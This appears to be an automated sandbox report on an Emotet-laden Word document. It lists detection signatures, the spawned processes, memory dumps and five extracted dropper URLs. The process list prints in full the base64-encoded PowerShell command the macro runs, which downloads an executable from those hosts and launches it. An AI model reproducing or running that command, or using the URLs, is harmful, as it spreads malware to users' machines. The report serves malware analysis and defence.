Overview

overview

10

task1

 

10

Analysis

  • max time kernel
    29s
  • max time network
    23s
  • resource
    win7v191014
  • submitted
    05-02-2020 12:52

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a8c2484e46608a21dfeeff1ab85c6bf46bdf1322017201ce053086e9aedc663c.doc

  • Sample

    200205-pbx9p3jwm6

  • SHA256

    a8c2484e46608a21dfeeff1ab85c6bf46bdf1322017201ce053086e9aedc663c

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://alwaysonq.com/web_map/UkwFMlO/
exe.dropper

http://norbert.strzelecki.org/wp-includes/6jGh/
exe.dropper

http://bieres.lavachenoiresud.com/wp-includes/0wycYTX/
exe.dropper

https://theresurrectionchurch.nl/tmp/eo5st/
exe.dropper

https://tahfizbd.com/wp-admin/ulu/

Signatures

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Modifies registry class 280 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a8c2484e46608a21dfeeff1ab85c6bf46bdf1322017201ce053086e9aedc663c.doc"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1292
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABIAHAAcQBvAG4AYQBiAHkAbABrAGUAPQAnAFIAdgB5AHgAcwBnAHMAcgBuAGEAJwA7ACQATABqAGUAYgBnAGsAeQBzAGgAIAA9ACAAJwAzADMAMAAnADsAJABYAGcAdQBoAGUAYgBzAGkAYwBuAG4AawA9ACcAUAB2AHIAdQBnAGwAcwBqAGwAbQAnADsAJABYAGEAawBkAGQAeQB4AGwAcQB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAGoAZQBiAGcAawB5AHMAaAArACcALgBlAHgAZQAnADsAJABCAG4AegB1AG8AaQB5AHMAPQAnAEQAZABnAGMAZgBkAG8AaQBsAG4AagB3ACcAOwAkAEYAcQBkAGYAbAB2AGkAeQBvAGMAeAB1AGsAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AdwBlAGIAQwBsAEkAZQBuAFQAOwAkAEEAbwBkAHIAaQBuAHYAbQBjAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBsAHcAYQB5AHMAbwBuAHEALgBjAG8AbQAvAHcAZQBiAF8AbQBhAHAALwBVAGsAdwBGAE0AbABPAC8AKgBoAHQAdABwADoALwAvAG4AbwByAGIAZQByAHQALgBzAHQAcgB6AGUAbABlAGMAawBpAC4AbwByAGcALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA2AGoARwBoAC8AKgBoAHQAdABwADoALwAvAGIAaQBlAHIAZQBzAC4AbABhAHYAYQBjAGgAZQBuAG8AaQByAGUAcwB1AGQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADAAdwB5AGMAWQBUAFgALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQByAGUAcwB1AHIAcgBlAGMAdABpAG8AbgBjAGgAdQByAGMAaAAuAG4AbAAvAHQAbQBwAC8AZQBvADUAcwB0AC8AKgBoAHQAdABwAHMAOgAvAC8AdABhAGgAZgBpAHoAYgBkAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AGwAdQAvACcALgAiAHMAcABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgBnAGIAZQBjAG8AdgBpAGcAZQBhAGUAagA9ACcARgBtAHEAaAB1AHMAbgBuAGQAZwBvAHUAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUQByAGoAbABwAGYAdAB6AHkAegBuAGYAZwAgAGkAbgAgACQAQQBvAGQAcgBpAG4AdgBtAGMAegApAHsAdAByAHkAewAkAEYAcQBkAGYAbAB2AGkAeQBvAGMAeAB1AGsALgAiAGQATwBXAE4AbABgAG8AYABBAEQAYABGAGkAbABFACIAKAAkAFEAcgBqAGwAcABmAHQAegB5AHoAbgBmAGcALAAgACQAWABhAGsAZABkAHkAeABsAHEAdAApADsAJABRAGYAawBjAHkAaQBnAHUAcQBvAHoAPQAnAEMAYwBhAHQAZwBqAGcAYQBzAG8AaABlAGgAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABYAGEAawBkAGQAeQB4AGwAcQB0ACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADQANgAyADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAcgBgAEUAYQBUAEUAIgAoACQAWABhAGsAZABkAHkAeABsAHEAdAApADsAJABOAHQAcwBoAHQAbgB2AHQAaABqAHEAeQBzAD0AJwBVAHgAcgBsAGIAZgB2AG4AdAB1AG0AeQAnADsAYgByAGUAYQBrADsAJABZAHEAcABoAHcAYwB1AGgAPQAnAE8AZwBnAG0AdwB0AGgAaQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAGgAcQBoAHcAcwByAGcAeQBtAGcAcABmAD0AJwBUAGEAcgB2AHgAeABuAGsAbgB3ACcA
    1⤵
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:676
  • C:\Users\Admin\330.exe
    C:\Users\Admin\330.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EmotetMutantsSpam
    • Drops file in System32 directory
    PID:1376
    • C:\Windows\SysWOW64\msvcirt\msvcirt.exe
      "C:\Windows\SysWOW64\msvcirt\msvcirt.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1900

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1292-0-0x00000000060D0000-0x00000000060D4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-1-0x00000000061B0000-0x00000000061B4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-2-0x00000000061B0000-0x00000000061B4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-3-0x0000000009220000-0x0000000009224000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-6-0x000000000B2E0000-0x000000000B2E4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-7-0x000000000C360000-0x000000000C364000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-9-0x000000000C360000-0x000000000C364000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1376-11-0x00000000002E0000-0x00000000002F3000-memory.dmp

    Filesize

    76KB

    Download

  • memory/1376-12-0x0000000000400000-0x0000000000428000-memory.dmp

    Filesize

    160KB

    Download